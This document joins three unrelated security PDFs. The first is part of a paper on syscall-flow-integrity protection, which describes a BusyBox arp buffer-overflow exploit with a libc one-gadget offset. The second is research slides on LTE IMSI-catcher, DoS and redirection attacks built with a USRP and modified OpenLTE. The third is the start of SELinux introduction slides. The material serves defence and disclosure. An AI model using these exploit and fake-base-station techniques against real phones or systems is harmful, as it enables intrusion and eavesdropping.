Contrary, if only the syscall origin is enforced, the
mprotect syscall is only allowed at certain syscall instruc-
tions. Hence, an attacker needs to construct a ROP chain
that sets up the necessary registers for the syscall and then
returns to such a location. In most cases, the only instance
where mprotect is allowed is within the libc mprotect
function. If executed from there, the syscall succeeds. If
the syscall originates from another location, the check
fails, and the application is terminated. Still, with only
syscall origins being enforced, the previous syscall is not
considered, allowing an attacker to perform the attack at
any point in time.
With both active, i.e., full SFIP, several restrictions are
applied to a potential attack. The attacker must construct
a ROP chain that either starts after a syscall with a valid
transition to mprotect was executed, or the ROP chain
must contain a valid sequence of syscalls that lead to
such a state, i.e., a mimicry attack (cf. Section 5.2.3).
Additionally, all syscalls must originate from a location
where they can legally occur. These additional constraints
significantly increase the security of the system.
5.2.2. Real-world Exploit For a real-world application,
we evaluate a stack-based buffer overflow in the BusyBox
arp applet from version 1.4.0 to version 1.23.1. In line
with our threat model, we assume that all software-based
security mechanisms, such as ASLR and stack protector,
have already been circumvented. The vulnerable code
is in the arp_getdevhw function, which copies a user-
provided command-line parameter to a stack-allocated
structure using strcpy. By providing a device name
longer than IFNAMSIZ (default 16 characters), this over-
flow overwrites the stack content, including the stored
program counter.
The simplest exploit we found is to mount a return2libc
attack using a one gadget RCE, i.e., a gadget that directly
spawns a shell. In libc version 2.23, we discovered such a
gadget at offset 0xf0897, with the only requirement that
offset 0x70 on the stack is zero, which is luckily the case.
Hence, by overwriting the stored program counter with
that offset, we can successfully replace the application
with an interactive shell. With SFIP, this exploit is pre-
vented. Running the exploit executes the socket syscall
right before the execve syscall that opens the shell. While
the execve syscall is at the correct location, the state ma-
chine does not allow a transition from the socket to the
execve syscall. Hence, exploits that directly open a shell
are prevented. We also verified that there is no possible
transition from socket to mprotect,; hence loaded shell-
code cannot be marked as executable. There are only 21
syscalls after a socket syscall allowed by the state machine.
Especially as neither the mprotect nor the execve syscall
are available, possible exploits are drastically reduced.
To circumvent the protection, an attacker would need to
find gadgets allowing a valid transition chain from the
socket to the execve (or mprotect) syscall. We also note
that the buffer overflow itself is also a limiting factor. As
the overflow is caused by a strcpy function, the exploit
payload, i.e., the ROP chain, cannot contain any null byte.
Thus, given that user-space addresses on 64-bit systems
always have the 2 most-significant address bits set to 0, a
longer chain is extremely difficult to craft.
5.2.3. Syscall-Flow-Integrity Protection and Mimicry
Attacks We consider the possibility of mimicry at-
tacks [65, 66] where an attacker tries to circumvent a
detection system by evading the policy. For instance, if an
intrusion detection system is trained to detect a specific
sequence of syscalls as malicious, an attacker can add
arbitrary, for the attack unneeded, syscalls that hide the
actual attack. With SFIP, such attacks become signifi-
cantly more complicated. An attacker needs to identify
the last executed syscall and knowledge of the valid tran-
sitions for all syscalls. With this knowledge, the attacker
needs to perform a sequence of syscalls that forces the
state machine into a state where the malicious syscall
is a valid transition. Additionally, as syscall origins are
enforced, the attacker has to do this in a ROP attack and
is limited to syscall locations where the specific syscalls
are valid. While this does not make mimicry attacks im-
possible, it adds several constraints that make the attack
significantly harder.
5.2.4. Security of Syscall-Flow Information in the Ker-
nel The security of the syscall-flow information stored in
the kernel is crucial for effective enforcement. Once the
application has sent the information to the kernel for en-
forcement, it is the responsibility of the kernel to prevent
malicious changes to the information. The case where
the initial information sent to the kernel is malicious is
outside of the threat model (cf. Section 3.1).
The kernel stores the information in kernel memory;
hence direct access and manipulation is not possible. The
only way to modify the information is through our new
syscall. Our implementation currently does not allow for
any changes to the installed information, i.e., no updates
are allowed. An attacker using our syscall and a ROP
attack to manipulate the information is also not possible
as the syscall itself needs to pass SFIP checks before being
executed. As the application contains no valid transition
nor location for the syscall, the kernel terminates the
application.
Still, as allowing no updates is a design decision, an-
other implementation might consider allowing updates. In
this case, the application needs to perform our new syscall
to update the filters. Before our syscall is executed, SFIP
is applied to the syscall, i.e., it is verified whether there
is a valid transition to it and whether it originates at the
correct location. If not, the kernel terminates the appli-
cation; otherwise, the update is applied. In this case, if
timed correctly, an attacker is able to maliciously modify
the stored information.
5.2.5. State Machine Reachability Anaysis We anal-
yse the state machine of several real-world applications
in more detail. We define a state in our state machine
as a syscall with at least one outgoing transition. While
Wagner and Dean [65] only provide information on the
average branching factor, i.e., the number of average
transitions per state, we extend upon this to provide addi-
tional insights into automatically generated syscall state
machines. We focus on several key factors: the overall
number of states in the application and the minimum,
maximum, and average number of transitions across these
states. These are key factors that determine the effective-
ness of SFIP. We do not consider additional protection
provided by enforcing syscall origins. We again rely on
real-world applications that have been used in previous
work [10, 16, 24, 60]. For busybox and coreutils, we
do not provide the data for every utility individually, but
instead present the average of all contained utilities, i.e.,
398 and 103, respectively. To determine the improvement
in security, we consider an unprotected version of the
respective application, i.e., every syscall can follow the
previously executed syscall. Additionally, we compare
our results to a seccomp-based version.
Results
Table 2 shows the results of this evaluation. ng-
inx shows the highest number of states with 108, followed
by memcached, mutool, and ffmpeg with 87, 61, and 56
states, respectively. coreutils and busybox also provide
multiple functionalities but split across various utilities.
Hence, their number of states is comparatively low.
Interestingly, each application has at least one state
with only one valid transition. We manually verified this
transition, and in every case, it is a transition from the
exit_group syscall to the exit syscall, which is indeed the
only valid transition for this syscall.
The combination of the average and maximum number
of transitions together with the number of states provides
some interesting insight. We observe that in most cases,
the number of average transitions is relatively close to
the maximum number of transitions, while the difference
to the number of states can be larger. This indicates
that our state machine is heavily interconnected. Mod-
ern applications delegate many tasks via syscalls to the
kernel, such as allocating memory, sending data over the
network, or writing to a file. As syscalls can fail, they
are often followed by error checking code that performs
application-specific error handling, logs the error, or ter-
minates the application. Hence, a potential transition to
these syscalls is automatically detected, leading to larger
state machines. Another source is locking, as the involved
syscalls can be preceded and followed by a wide variety
of other syscalls. Additionally, the overapproximation of
indirect calls also increases the number of transitions.
Even with such interconnected state machines, the secu-
rity improvement is still large compared to an unprotected
version of the application or even a seccomp-based ver-
sion. In the case of an unprotected version, all syscalls are
valid successors to a previously executed syscall. An un-
modified Linux kernel 5.13 provides 357 syscalls. Com-
pared to nginx, which has the highest number of average
transitions with 66, this is an increase of factor 5.4 in
terms of available transitions. In our state machine, the
number of states corresponds to the number of syscalls
an automated approach needs to allow for seccomp-based
protection. These numbers also match the numbers pro-
vided in previous work on automated seccomp filter gen-
eration. For instance, Canella et al. [10] reported 105
syscalls in nginx and 63 in ffmpeg. Ghavamnia et al. [24]
reported 104 in nginx. Each such syscall can follow any
of the other syscalls that are part of the set. In the case of
nginx, this is around factor 1.6 more than in the average
state when SFIP is applied. Hence, we conclude that even
coarse-grained SFIP can drastically increase the system’s
security.
5.2.6. Syscall Origins Analysis We perform a similar
analysis for our syscall origins in real-world applications.
We focus on analyzing the number of syscall locations
per application and for each such location, the number
of syscalls that can be executed. Special focus is put
on the number of syscalls that can be invoked through
the syscall wrapper functions as they can allow a wide
variety of syscalls. Hence, the fewer syscalls are available
through these functions, the better the security of the
system.
Results
We show the results of this evaluation in Table 3.
The average number of offsets per syscall indicates that
many syscalls are available at multiple locations. This
is most likely due to the inlining of the syscall. This
number is largely driven by the futex syscall, as locking is
required in many places of applications. Error handling is
a less driving factor in this case as these are predominantly
printed using dedicated, non-inlined functions.
The last two columns analyze the number of syscalls
that can be invoked by the respective syscall wrapper func-
tion and demonstrate a non-bijective mapping of syscalls
to syscall locations. Relatively few syscalls are available
through the syscall() function as it can be more easily
Table 2: We evaluate various properties of applications state machines, including the average number of transitions per
state, number of states in the state machine, min and max transitions. Busybox and coreutils show the averages over all
contained utilites (398 and 103 utilities, respectively).
Application
Average Transitions
#States
Min Transitions
Max Transitions
busybox
15.73
24.51
1.0
21.09
pwgen
12.42
19
1
16
muraster
17.51
41
1
33
nginx
65.55
108
1
80
coreutils
15.75
27.11
1.0
23.0
ffmpeg
48.48
56
1
51
memcached
40.6
87
1
71
mutool
32.0
61
1
46
Table 3: We evaluate various metrics for our syscall location enforcement, including the total number of functions
containing syscalls, min, max and average number of syscalls per function, total syscall offsets found, average offsets
per syscall, and the number of syscalls in the used musl syscall wrapper functions. Busybox and coreutils show the
averages over all contained utilites (398 and 103 utilities, respectively).
Application
#Functions
Min Syscalls
Max Syscalls
Avg. Syscalls
per Function
Total #Offsets
Avg #Offsets
#syscall()
#syscall_cp()
#syscall_cp_asm()
busybox
30.57
1.0
9.83
1.48
102.64
3.75
1.71
9.79
0
pwgen
28
1
3
1.25
84
4.42
0
2
0
muraster
55
1
12
1.62
193
4.6
0
4
0
nginx
105
1
24
1.53
318
3.0
7
24
0
coreutils
36.86
1.0
4.21
1.38
116.71
4.42
1.0
3.41
0
ffmpeg
89
1
13
1.55
279
4.98
0
13
13
memcached
101
1
20
1.5
317
3.69
0
20
0
mutool
81
1
14
1.67
278
4.15
6
14
0
inlined, i.e., it is almost always inlined within libc itself.
On the other hand, syscall_cp() cannot be inlined as
it is a wrapper around an aliased function that performs
the actual syscall.
Our results also indicate that, on average, every func-
tion that contains a syscall contains more than one syscall.
nginx contains the most functions with a syscall and the
highest number of total syscall offsets. Without syscall-
origin enforcement, an attacker can choose from 318
syscall locations to execute any of the 357 syscalls pro-
vided by Linux 5.13 during a ROP attack. With our en-
forcement, the number is drastically reduced as each one
of these locations can, on average, perform only 3 syscalls
instead of 357.
6. Discussion
Limitations and Future Work
Our proof-of-concept
implementation currently does not handle signals and
syscalls invoked in a signal handler. However, this is not
a conceptual limitation. The compiler can identify all
functions that serve as a signal handler and the functions
that are reachable through it. Hence, it can extract a per-
signal state machine to which the kernel switches when
it sets up the signal stack frame. This allows for small
per-signal state machines, which further improve security.
As this requires significant engineering work, we leave
the implementation and evaluation for future work.
Our state-machine construction leads to coarse-grained
state machines, which can be improved by the fact that
we can statically identify syscall origins. Future work
can intertwine this information on a deeper level with
the generated state machine. By doing so, a transition to
another state is then not only dependent on the previous
and the current syscall number but also on the virtual ad-
dress of the previous and current syscall instruction. This
allows to better represent the syscall-flow graph of the
application without relying on context-sensitivity or call
stack information [65, 28, 58]. As this requires significant
changes to the compiler and the enforcement in the kernel
and thorough evaluation, we leave this for future work.
Recent work has proposed hardware support for sec-
comp [60].
In future work, we intend to investigate
whether similar approaches are possible to improve the
performance of SFIP.
Related Work
In 2001, the seminal work by Wagner
and Dean [65] introduced automatically-generated syscall
NDFAs, NDPDAs, and digraphs for sequence checks in
intrusion detection systems. SFIP builds upon digraphs
but modifies their construction and representation to in-
crease performance. We further extend upon their work by
additionally verifying the origin of a syscall. The accuracy
and performance of SFIP allows real-time enforcement in
large-scale applications.
Several papers have focused on extracting and mod-
eling an applications control flow based on the work by
Forrest et al. [19]. Frequently, such approaches rely on dy-
namic analysis [21, 25, 32, 34, 44, 68, 47, 63, 69]. Other
approaches rely on machine-learning techniques to learn
syscall sequences or detect intrusions [74, 53, 48, 8, 67,
26]. Giffin et al. [27] proposed incorporating environ-
ment information in the static analysis to generate more
precise models. The Dyck model [28] is a prominent
approach for learning syscall sequences that rely on stack
information and context-sensitive models. Other works
disregard control flow and focus instead on detecting in-
trusions based on syscall arguments [42, 50]. Forrest et al.
[20] provide an analysis on the evolution of system-call
monitoring. Our work differs as we do not require stack
information, context-sensitive models, dynamic tracing
of an application, or code instrumentation. The only addi-
tional information we consider is the mapping of syscalls
to syscall instructions.
Recent work has investigated the possibility of automat-
ically generating seccomp filters from source or existing
binaries [16, 10, 24, 23, 52]. SysFlow can be extended to
generate the required information from binaries as well.
More recent work proposed a faster alternative to sec-
comp while also enabling complex argument checks [9].
In contrast to these works, we consider syscall sequences
and origins, which requires additional challenges to be
solved (cf. Section 3.3).
A similar approach to our syscall-origin enforcement
has been proposed by Linn et al. [45] and de Raadt [15].
The former extracts the syscall locations and numbers
from a binary and enforces them on the kernel level but
fails in the presence of ASLR. The latter restricts the
execution of syscalls to entire regions, but not precise
locations, i.e., the entire text segment of a static binary
is a valid origin. Additionally, in the entire region, any
syscall is valid at any syscall location. Our work improves
upon them in several ways as we (1) present a way to
enforce syscall origins in the presence of ASLR, (2) limit
the execution of specific syscalls to precise locations,
(3) combine syscall origins with state machines which
lead to a significant increase in security.
7. Conclusion
In this paper, we introduced the concept of syscall-flow-
integrity protection (SFIP), complementing the concept
of CFI with integrity for user-kernel transitions. In our
evaluation, we showed that SFIP can be applied to large-
scale applications with minimal slowdowns. In a micro-
and a macrobenchmark, we observed an overhead of only
13.1 % and 7.4 %, respectively. In terms of security, we
discussed and demonstrated its effectiveness in preventing
control-flow-hijacking attacks in real-world applications.
Finally, to highlight the reduction in attack surface, we
performed an analysis of the state machines and syscall-
origin mappings of several real-world applications. On
average, we showed that SFIP decreases the number of
possible transitions by 41.5 % compared to seccomp and
91.3 % when no protection is applied.
References
[1] Martín Abadi, Mihai Budiu, Ulfar Erlingsson, and Jay Ligatti.
Control-Flow Integrity. In CCS, 2005.
[2] Lars Ole Andersen. Program Analysis and Specialization for the
C Programming Language. PhD thesis, 1994.
[3] Android. Application Sandbox, 2021.
[4] AppArmor. AppArmor: Linux kernel security module, 2021.
[5] Tyler K. Bletsch, Xuxian Jiang, Vincent W. Freeh, and Zhenkai
Liang. Jump-oriented programming: a new class of code-reuse
attack. In AsiaCCS, 2011.
[6] Davidlohr Bueso. tools/perf-bench: Add basic syscall benchmark,
2019.
[7] Nathan Burow, Scott A. Carr, Joseph Nash, Per Larsen, Michael
Franz, Stefan Brunthaler, and Mathias Payer. Control-Flow In-
tegrity: Precision, Security, and Performance. ACM Computing
Surveys, 2017.
[8] Jeffrey Byrnes, Thomas Hoang, Nihal Nitin Mehta, and Yuan
Cheng. A Modern Implementation of System Call Sequence
Based Host-based Intrusion Detection Systems. In TPS-ISA,
2020.
[9] Claudio Canella,
Andreas Kogler,
Lukas Giner,
Daniel
Gruss, and Michael Schwarz.
Domain Page-Table Isolation.
arXiv:2111.10876, 2021.
[10] Claudio Canella, Mario Werner, Daniel Gruss, and Michael
Schwarz.
Automating Seccomp Filter Generation for Linux
Applications. In CCSW, 2021.
[11] Stephen Checkoway, Lucas Davi, Alexandra Dmitrienko, Ahmad-
Reza Sadeghi, Hovav Shacham, and Marcel Winandy. Return-
oriented programming without returns. In CCS, 2010.
[12] Jonathan Corbet. Constant-action bitmaps for seccomp(), 2020.
[13] Crispan Cowan, Calton Pu, Dave Maier, Jonathan Walpole, Peat
Bakke, Steve Beattie, Aaron Grier, Perry Wagle, Qian Zhang,
and Heather Hinton. Stackguard: Automatic adaptive detection
and prevention of buffer-overflow attacks. In USENIX Security,
1998.
[14] Lucas Davi, Ahmad-Reza Sadeghi, Daniel Lehmann, and Fabian
Monrose. Stitching the gadgets: On the ineffectiveness of coarse-
grained control-flow integrity protection. In USENIX Security
Symposium, August 2014.
[15] Theo de Raadt. syscall call-from verification, 2019.
[16] Nicholas DeMarinis, Kent Williams-King, Di Jin, Rodrigo Fon-
seca, and Vasileios P. Kemerlis. sysfilter: Automated System
Call Filtering for Commodity Software. In RAID, 2020.
[17] Jake Edge. System call filtering and no_new_privs, 2012.
[18] Jake Edge. A seccomp overview, 2015.
[19] S. Forrest, S.A. Hofmeyr, A. Somayaji, and T.A. Longstaff. A
sense of self for Unix processes. In S&P, 1996.
[20] Stephanie Forrest, Steven Hofmeyr, and Anil Somayaji. The
Evolution of System-Call Monitoring. In ACSAC, 2008.
[21] Thomas D. Garvey and Teresa F. Lunt. Model-based intrusion
detection. In NCSC, 1991.
[22] Xinyang Ge, Nirupama Talele, Mathias Payer, and Trent Jaeger.
Fine-Grained Control-Flow Integrity for Kernel Software. In
Euro S&P, 2016.
[23] Seyedhamed Ghavamnia, Tapti Palit, Shachee Mishra, and
Michalis Polychronakis. Confine: Automated System Call Policy
Generation for Container Attack Surface Reduction. In RAID,
2020.
[24] Seyedhamed Ghavamnia, Tapti Palit, Shachee Mishra, and
Michalis Polychronakis. Temporal System Call Specialization
for Attack Surface Reduction. In USENIX Security Symposium,
2020.
[25] Anup Ghosh, Aaron Schwartzbard, and Michael Schatz. Learning
Program Behavior Profiles for Intrusion Detection. In ID, 1999.
[26] Anup K. Ghosh and Aaron Schwartzbard. A Study in Using
Neural Networks for Anomaly and Misuse Detection. In USENIX
Security Symposium, 1999.
[27] Jonathon Giffin, David Dagon, Somesh Jha, Wenke Lee, and
Barton Miller. Environment-Sensitive Intrusion Detection. In
RAID, 2005.
[28] Jonathon T Giffin, Somesh Jha, and Barton P Miller. Efficient
Context-Sensitive Intrusion Detection. In NDSS, 2004.
[29] Enes Göktas, Elias Athanasopoulos, Herbert Bos, and Georgios
Portokalidis. Out of control: Overcoming control-flow integrity.
In S&P, 2014.
[30] Google. Seccomp filter in Android O, 2017.
[31] Michael Hind. Pointer analysis: Haven’t we solved this problem
yet? In PASTE, 2001.
[32] Steven A. Hofmeyr, Stephanie Forrest, and Anil Somayaji. In-
trusion Detection Using Sequences of System Calls. J. Comput.
Secur., 1998.
[33] Tom Hromatka. seccomp and libseccomp performance improve-
ments, 2018.
[34] K. Ilgun, R.A. Kemmerer, and P.A. Porras.
State transition
analysis: a rule-based intrusion detection approach. TSE, 1995.
[35] Kyriakos K. Ispoglou, Bader AlBassam, Trent Jaeger, and Math-
ias Payer. Block Oriented Programming: Automating Data-Only
Attacks. In CCS, 2018.
[36] Vasileios Kemerlis. Protecting Commodity Operating Systems
through Strong Kernel Isolation. PhD thesis, Columbia Univer-
sity, 2015.
[37] Vasileios P Kemerlis, Michalis Polychronakis, and Angelos D
Keromytis. ret2dir: Rethinking kernel isolation. In USENIX
Security Symposium, 2014.
[38] Vasileios P. Kemerlis, Georgios Portokalidis, and Angelos D.
Keromytis. kguard: Lightweight kernel protection against return-
to-user attacks. In USENIX Security Symposium, 2012.
[39] Richard A Kemmerer and Giovanni Vigna. Intrusion detection: a
brief history and overview. Computer, 2002.
[40] Yoongu Kim, Ross Daly, Jeremie Kim, Chris Fallin, Ji Hye
Lee, Donghyuk Lee, Chris Wilkerson, Konrad Lai, and Onur
Mutlu. Flipping Bits in Memory Without Accessing Them: An
Experimental Study of DRAM Disturbance Errors. In ISCA,
2014.
[41] Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel
Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Man-
gard, Thomas Prescher, Michael Schwarz, and Yuval Yarom.
Spectre Attacks: Exploiting Speculative Execution. In S&P,
2019.
[42] Christopher Kruegel, Darren Mutz, Fredrik Valeur, and Giovanni
Vigna. On the Detection of Anomalous System Call Arguments.
In ESORICS, 2003.
[43] Bingchen Lan, Yan Li, Hao Sun, Chao Su, Yao Liu, and Qingkai
Zeng. Loop-oriented programming: a new code reuse attack to
bypass modern defenses. In IEEE Trustcom/BigDataSE/ISPA,
2015.
[44] Terran Lane and Carla E. Brodley. Temporal Sequence Learning
and Data Reduction for Anomaly Detection. TOPS, 1999.
[45] C. M. Linn, M. Rajagopalan, S. Baker, C. Collberg, S. K. Debray,
and J. H. Hartman. Protecting Against Unexpected System Calls.
In USENIX Security Symposium, 2005.
[46] Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher,
Werner Haas, Anders Fogh, Jann Horn, Stefan Mangard, Paul
Kocher, Daniel Genkin, Yuval Yarom, and Mike Hamburg. Melt-
down: Reading Kernel Memory from User Space. In USENIX
Security Symposium, 2018.
[47] Teresa F. Lunt. Automated Audit Trail Analysis and Intrusion
Detection: A Survey. In NCSC, 1988.
[48] Shaohua Lv, Jian Wang, Yinqi Yang, and Jiqiang Liu. Intru-
sion Prediction With System-Call Sequence-to-Sequence Model.
IEEE Access, 2018.
[49] Microsoft. Data Execution Prevention, 2021.
[50] Darren Mutz, Fredrik Valeur, Giovanni Vigna, and Christopher
Kruegel. Anomalous System Call Detection. TOPS, 2006.
[51] Nergal. The advanced return-into-lib(c) explits: PaX case study,
2001.
[52] Shankara Pailoor, Xinyu Wang, Hovav Shacham, and Isil Dil-
lig. Automated Policy Synthesis for System Call Sandboxing.
PACMPL, 2020.
[53] Y. Qiao, X.W. Xin, Y. Bin, and S. Ge. Anomaly intrusion detec-
tion method based on HMM. Electronics Letters, 2002.
[54] Charles Reis, Alexander Moshchuk, and Nasko Oskov. Site
Isolation: Process Separation for Web Sites within the Browser.
In USENIX Security Symposium, 2019.
[55] Roman Rogowski, Micah Morton, Forrest Li, Fabian Monrose,
Kevin Z. Snow, and Michalis Polychronakis. Revisiting Browser
Security in the Modern Era: New Data-Only Attacks and De-
fenses. In EuroS&P, 2017.
[56] Felix Schuster, Thomas Tendyck, Christopher Liebchen, Lucas
Davi, Ahmad-Reza Sadeghi, and Thorsten Holz. Counterfeit
Object-oriented Programming: On the Difficulty of Preventing
Code Reuse Attacks in C++ Applications. In S&P, 2015.
[57] Michael Schwarz, Moritz Lipp, Daniel Moghimi, Jo Van Bulck,
Julian Stecklina, Thomas Prescher, and Daniel Gruss. Zom-
bieLoad: Cross-Privilege-Boundary Data Sampling. In CCS,
2019.
[58] R. Sekar, M. Bendre, D. Dhurjati, and P. Bollineni.
A fast
automaton-based method for detecting anomalous program be-
haviors. In S&P, 2001.
[59] Hovav Shacham. The geometry of innocent flesh on the bone:
Return-into-libc without function calls (on the x86). In CCS,
2007.
[60] Dimitrios Skarlatos, Qingrong Chen, Jianyan Chen, Tianyin Xu,
and Josep Torrellas. Draco: Architectural and Operating System
Support for System Call Security. In MICRO, 2020.
[61] Brad Spengler. Recent ARM Security Improvements, 2013.
[62] Laszlo Szekeres, Mathias Payer, Tao Wei, and Dawn Song. SoK:
Eternal War in Memory. In S&P, 2013.
[63] H.S. Teng, K. Chen, and S.C. Lu. Adaptive real-time anomaly
detection using inductively generated sequential patterns. In S&P,
1990.
[64] Stephan van Schaik, Alyssa Milburn, Sebastian österlund, Pietro
Frigo, Giorgi Maisuradze, Kaveh Razavi, Herbert Bos, and Cris-
tiano Giuffrida. RIDL: Rogue In-flight Data Load. In S&P,
2019.
[65] D. Wagner and R. Dean. Intrusion detection via static analysis.
In S&P, 2001.
[66] David Wagner and Paolo Soto. Mimicry Attacks on Host-Based
Intrusion Detection Systems. In CCS, 2002.
[67] C. Warrender, S. Forrest, and B. Pearlmutter. Detecting intrusions
using system calls: alternative data models. In S&P, 1999.
[68] Lee Wenke, S.J. Stolfo, and K.W. Mok. A data mining framework
for building intrusion detection models. In S&P, 1999.
[69] Andreas Wespi, Marc Dacier, and Hervé Debar. Intrusion De-
tection Using Variable-Length Audit Trail Patterns. In RAID,
2000.
[70] Mozilla Wiki. Project Fission, 2019.
[71] Mozilla Wiki. Security/Sandbox, 2019.
[72] SELinux Wiki. FAQ — SELinux Wiki, 2009.
[73] Yuval Yarom and Katrina Falkner. Flush+Reload: a High Reso-
lution, Low Noise, L3 Cache Side-Channel Attack. In USENIX
Security Symposium, 2014.
[74] Zhang Zhengdao, Peng Zhumiao, and Zhou Zhiping. The Study
of Intrusion Prediction Based on HsMM. In APSCC, 2008. | pdf |
LTE REDIRECTION
Forcing Targeted LTE Cellphone into Unsafe Network
Wanqiao Zhang
Unicorn Team – Communication security researcher
Haoqi Shan
Unicorn Team – Hardware/Wireless security researcher
Qihoo 360 Technology Co. Ltd.
LTE and IMSI catcher myths
• In Nov. 2015, BlackHat EU, Ravishankar Borgaonkar, and Altaf Shaik etc.
introduced the LTE IMSI catcher and DoS attack.
IMSI Catcher
Once a cellphone goes through
the fake network coverage area,
its IMSI will be reported to the
fake network.
DoS Attack
DoS message examples:
ü You are an illegal cellphone!
ü Here is NO network available. You
could shut down your 4G/3G/2G
modem.
Redirection Attack
Malicious LTE: “Hello
cellphone, come into my
GSM network…”
Demo
Fake LTE Network
Fake GSM Network
USRPs
Demo Video
Risk
• If forced into fake network
• The cellphone will have no service (DoS).
• The fake GSM network can make malicious call and SMS.
• If forced into rogue network
• All the traffic (voice and data) can be eavesdropped.
A femtocell
controlled
by attacker
LTE Basic Procedure
• (Power on)
• Cell search, MIB, SIB1, SIB2 and other SIBs
• PRACH preamble
• RACH response
• RRC Connection Request
• RRC Connection Setup
• RRC Connection Setup Complete + NAS: Attach request + ESM:
PDN connectivity request
• RRC: DL info transfer + NAS: Authentication request
• RRC: UL info transfer + NAS: Authentication response
• RRC: DL info transfer + NAS: Security mode command
• RRC: UL info transfer + NAS: Security mode completer
• ……
Unauthorized area
Attack Space!
Procedure of IMSI Catcher
Firstly send a TAU
reject, then cellphone
will send Attach
Request, with its IMSI!
Procedure of DoS Attack
Attach Reject message
can bring reject cause.
Some special causes
result in NO service on
cellphone.
Procedure of Redirection Attack
RRC Release message
can bring the cell info
which it can let cellphone
re-direct to.
How to Build Fake LTE Network
• Computer + USRP
How to Build Fake LTE Network
• There are some popular open source LTE projects:
• Open Air Interface by Eurecom
• http://www.openairinterface.org/
• The most completed and open source LTE software
• Support connecting cellphone to Internet
• But have complicated software architecture
• OpenLTE by Ben Wojtowicz
• http://openlte.sourceforge.net/
• Haven’t achieved stable LTE data connection but functional enough for fake LTE network
• Beautiful code architecture
• More popular in security researchers
OpenLTE
OpenLTE Source Code (1/3)
In current OpenLTE release, the TAU request isn’t handled.
But TAU reject msg packing function is available.
So we could add some codes to handle TAU case and give appropriate TAU
reject cause.
Procedure of IMSI Catcher
Firstly send a TAU
reject, then cellphone
will send Attach
Request, with its IMSI!
OpenLTE Source Code (1/3)
Set the mme procedure as TAU REQUET
Call the TAU reject msg packing function
Refer to Attach reject function
OpenLTE Souce Code (2/3)
DoS attack can directly utilize the cause setting in Attach Reject message.
Procedure of DoS Attack
Attach Reject message
can bring reject cause.
Some special causes
result in NO service on
cellphone.
OpenLTE Source Code (3/3)
redirectCarrierInfo can be inserted into RRC Connection Release message.
OpenLTE Source Code (3/3)
Procedure of Redirection Attack
RRC Release message
can bring the cell info
which it can let cellphone
re-direct to.
Think from the other side
Attacker
Defender
Why is RRC redirection message not encrypted?
Is This a New Problem?
• "Security Vulnerabilities in the E-RRC Control Plane",
3GPP TSG-RAN WG2/RAN WG3/SA WG3 joint meeting,
R3-060032, 9-13 January 2006
• This document introduced a ‘Forced handover’ attack:
An attacker with the ability to generate RRC signaling—that is, any of the forms of
compromise listed above—can initiate a reconfiguration procedure with the UE, directing
it to a cell or network chosen by the attacker. This could function as a denial of service (if
the target network cannot or will not offer the UE service) or to allow a chosen network to
“capture” UEs.
An attacker who already had full control of one system (perhaps due to weaker security on
another RAT) could direct other systems’ UEs to “their” network as a prelude to more
serious security attacks using the deeply compromised system. Used in this way, the ability
to force a handover serves to expand any form of attack to UEs on otherwise secure
systems, meaning that a single poorly secured network (in any RAT that interoperates with
the E-UTRAN) becomes a point of vulnerability not only for itself but for all other
networks in its coverage area.
3GPP’s Decision
• “Reply LS on assumptions for security procedures”, 3GPP TSG SA WG3
meeting #45, S3-060833, 31st Oct - 3rd Nov 2006
(1) RRC Integrity and ciphering will be started only once during the attach
procedure (i.e. after the AKA has been performed) and can not be de-
activated later.
(2) RRC Integrity and ciphering algorithm can only be changed in the case of
the eNodeB handover.
Why 3GPP Made Such Decision
• In special cases, e.g. earthquake, hot events
• Too many people try to access one base station then make this base station overloaded.
• To let network load balanced, this base station can ask the new coming cellphone to
redirect to another base station.
• If you don’t tell cellphones which
base station is light-loaded,
the cellphones will blindly
and inefficiently search one
by one, and then increase
the whole network load.
Overloaded
Base station
Overloaded
Base station
Overloaded
Base station
Light-loaded
Base station
Network Availability vs.. Privacy
• Global roaming
• Battery energy saving
• Load balance
• IMSI Catcher
• DoS Attack
• Redirection Attack
VS.
Basic requirement
High level requirement
e.g. Wifi MAC addr tracking
Countermeasures (1/2)
• Cellphone manufacture – smart response
• Scheme 1: Don’t follow the redirection command, but auto-search other available base
station.
• Scheme 2: Follow the redirection command, but raise an alert to cellphone user: Warning!
You are downgraded to low security network.
Countermeasures (2/2)
• Standardization effort
• Fix the weak security of legacy network: GSM
• 3GPP TSG SA WG3 (Security) Meeting #83, S3-160702, 9-13 May
2016 Legacy Security Issues and Mitigation Proposals, Liaison
Statement from GSMA.
• Refuse one-way authentication
• Disabling compromised encryption in mobile
Acknowledgements
• Huawei
• Peter Wesley (Security expert)
• GUO Yi (3GPP RAN standardization expert)
• CHEN Jing (3GPP SA3 standardization expert)
• Qualcomm
• GE Renwei (security expert)
• Apple
• Apple product security team
Thank you! | pdf |
HITCON 101 Sharing
SELinux
從不認識到在一起
About Me
王禹軒 (Bighead)
● 中央大學 Advanced Defense Lab
○ 打胖
● 工研院 Intern
○ Whitelist 1.0 PoC
○ Hypervisor-based Whitelist (page verification)
○ SELinux
SELinux Top Search
The ways to disable SELinux
● Setenforce 0
● Edit /etc/selinux/config : SELINUX = permissive or disable
● Delete policy
● Get rid of the boot argument : security=selinux selinux=1
The ways to disable SELinux
● Setenforce 0
● Edit /etc/selinux/config : SELINUX = permissive or disable
● Delete policy
● Get rid of the boot argument : security=selinux selinux=1
● Do NOT use default SELinux-enabled distro (CentOS)
The ways to disable SELinux
● Setenforce 0
● Edit /etc/selinux/config : SELINUX = permissive or disable
● Delete policy
● Get rid of the boot argument : security=selinux selinux=1
● Do NOT use default SELinux-enabled distro (CentOS)
SELinux gives you the power to close it
Don’t be Afraid of SELinux
● 60 page survey paper
● 400 page SELinux Notebook
● Makefile survey
● Policy Set survey
● Powerful mentor
Don’t be Afraid of SELinux
● 60 page survey paper
● 400 page SELinux Notebook
● Makefile survey
● Policy Set survey
● Powerful mentor
Don’t be afraid! It is not scary
Trust Lovely Santa Claus
Reference : Santa Claus PNG Transparent Image - PngPix
Trust Evil Santa Claus !?
Futurama : Robot Santa Claus
Why Access Control ?
● Goal: Protect data and resources
from unauthorized use
○ Confidentiality (or secrecy) :
Related to disclosure of
information
○ Integrity :
Related to modification of
information
○ Availability :
Related to denial of access to
information
Reference: Security Awareness Posters
Access Control Basic Terminology
● Subject: Active entity – user or process
● Object: Passive entity – file or resource
● Access operations: read, write, ...
Subject
Object
Action
Access Control is Hard Because
